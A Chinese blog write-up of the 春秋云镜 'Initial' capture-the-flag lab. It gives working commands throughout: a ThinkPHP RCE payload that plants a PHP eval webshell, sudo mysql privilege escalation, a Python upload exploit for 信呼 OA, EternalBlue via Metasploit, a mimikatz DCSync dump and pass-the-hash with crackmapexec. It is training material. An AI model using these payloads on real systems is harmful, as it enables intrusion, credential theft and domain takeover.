春秋云镜-Initial

本文最后更新于 2025年7月18日 晚上

文件上传、DCSync

信息收集

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
└─# nmap -sS -sV -Pn -A 39.99.133.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-18 00:59 CST
Nmap scan report for 39.99.133.101
Host is up (0.064s latency).
Not shown: 986 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 f5:ca:b4:23:30:80:1d:cf:ea:13:a0:d9:56:ff:f6:84 (RSA)
| 256 17:84:60:d7:a9:fc:e1:ec:ea:31:a3:8c:55:12:1f:85 (ECDSA)
|_ 256 ed:73:ff:53:03:1f:b4:df:14:05:8c:40:64:7d:f2:1c (ED25519)
42/tcp filtered nameserver
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Bootstrap Material Admin
|_http-server-header: Apache/2.4.41 (Ubuntu)
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
593/tcp filtered http-rpc-epmap
1025/tcp filtered NFS-or-IIS
1068/tcp filtered instl_bootc
1434/tcp filtered ms-sql-m
3128/tcp filtered squid-http
4444/tcp filtered krb524
5800/tcp filtered vnc-http
5900/tcp filtered vnc
Aggressive OS guesses: Linux 2.6.32 (88%), Linux 2.6.39 (88%), Linux 3.10 - 3.12 (88%), Linux 3.4 (88%), Linux 3.5 (88%), Linux 4.4 (88%), Synology DiskStation Manager 5.1 (88%), WatchGuard Fireware 11.8 (88%), Linux 2.6.35 (87%), Linux 3.10 (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 12 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

开了很多端口

fscan

fscan 扫一下,thinkphp 5.0.23 版本,有漏洞,这是一个 rce

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
D:\aWeb\fscan-main>.\fscan.exe -h 39.99.133.101

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
39.99.133.101:22 open
39.99.133.101:80 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.133.101 code:200 len:5578 title:Bootstrap Material Admin
[+] PocScan http://39.99.133.101 poc-yaml-thinkphp5023-method-rce poc1
已完成 2/2
[*] 扫描结束,耗时: 55.1963091s

mysql 提权

1
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo '%3C%3Fphp+%40eval%28%24_POST%5B1%5D%29%3B%3F%3E' >shell.php

image-20250718043440601

蚁剑连接,发现 sudo -l 有 mysql ,用 mysql 提权

1
sudo mysql -e '\! /bin/sh'

image-20250718013242819

拿到 flag01

1
flag{60b53231-

内网扫描

靶机 IP 为

1
172.22.1.15

image-20250718014053058

传 fscan 扫内网

image-20250718015050474

可以得出以下信息

1
2
3
4
xiaorang.lab 域
172.22.1.2 DC01 域控
172.22.1.18 信呼 OA
172.22.1.21 存在 MS17-010 漏洞

frp 流量转发

上传 frp 把内网中的流量转发出来,上传 frps 和 frps.ini 到 vps,frpc 和 frpc.ini 到靶机

vps 先执行

1
./frps -c frps.ini

靶机执行

1
./frpc -c frpc.ini

已经转发出来了

image-20250718030001184

配置 proxfixer,配置全局代理

image-20250718030348756

也可以用 SwitchyOmega,感觉这个更方便

文件上传

访问 172.22.1.18 是一个信呼的 OA 系统,可以弱口令 admin:admin123 登录系统,系统存在文件上传漏洞,同 exp 目录下创建 webshell 文件,然后执行 exp 自动上传加载路径

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
import requests
session = requests.session()
url_pre = 'http://172.22.1.18/'
url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953'
url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913'
# url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11'
data1 = {
'rempass': '0',
'jmpass': 'false',
'device': '1625884034525',
'ltype': '0',
'adminuser': 'YWRtaW4=',
'adminpass': 'YWRtaW4xMjM=',
'yanzm': ''
}

r = session.post(url1, data=data1)
r = session.post(url2, files={'file': open('1.php', 'r+')})

filepath = str(r.json()['filepath'])
filepath = "/" + filepath.split('.uptemp')[0] + '.php'
id = r.json()['id']
url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}'
r = session.get(url3)
r = session.get(url_pre + filepath + "?1=system('dir")
print(r.text)
print(filepath)

加载出路径

image-20250718205453954

蚁剑连接,在 Administrator 用户的目录下拿到 flag2

image-20250718194206150

1
flag02: 2ce3-4813-87d4-

MS17-010

对 172.22.1.21 进行永恒之蓝攻击

1
2
3
4
5
6
proxychains msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 172.22.1.21
run

拿到 shell,之后调用 mimikatz 的 kiwi 模块横向

1
2
load kiwi
kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

image-20250718203336451

进行 DCSync 攻击,拿到域控 hash

拿 Administrator 用户的 hash,然后使用 crackmapexec 进行哈希传递攻击,实现 DC 域控上的任意命令执行获取 flag3

1
proxychains crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

image-20250718203112160

1
flag03: e8f88d0d43d6}

完整 flag

1
flag{60b53231-2ce3-4813-87d4-e8f88d0d43d6}

DCSync

参考 域渗透-DCSync

DCSync 是利用 DRS(Directory Replication Service) 协议通过 IDL_DRSGetNCChanges 从域控制器复制用户凭据,所以可以通过 DCSync 来导出所有用户的 hash 然后进行哈希传递攻击

利用条件:

获得以下任一用户的权限:

1
2
3
4
Administrators组内的用户
Domain Admins组内的用户
Enterprise Admins组内的用户
域控制器的计算机

春秋云镜-Initial
http://example.com/2025/07/18/春秋云镜-Initial/
作者
butt3rf1y
发布于
2025年7月18日
许可协议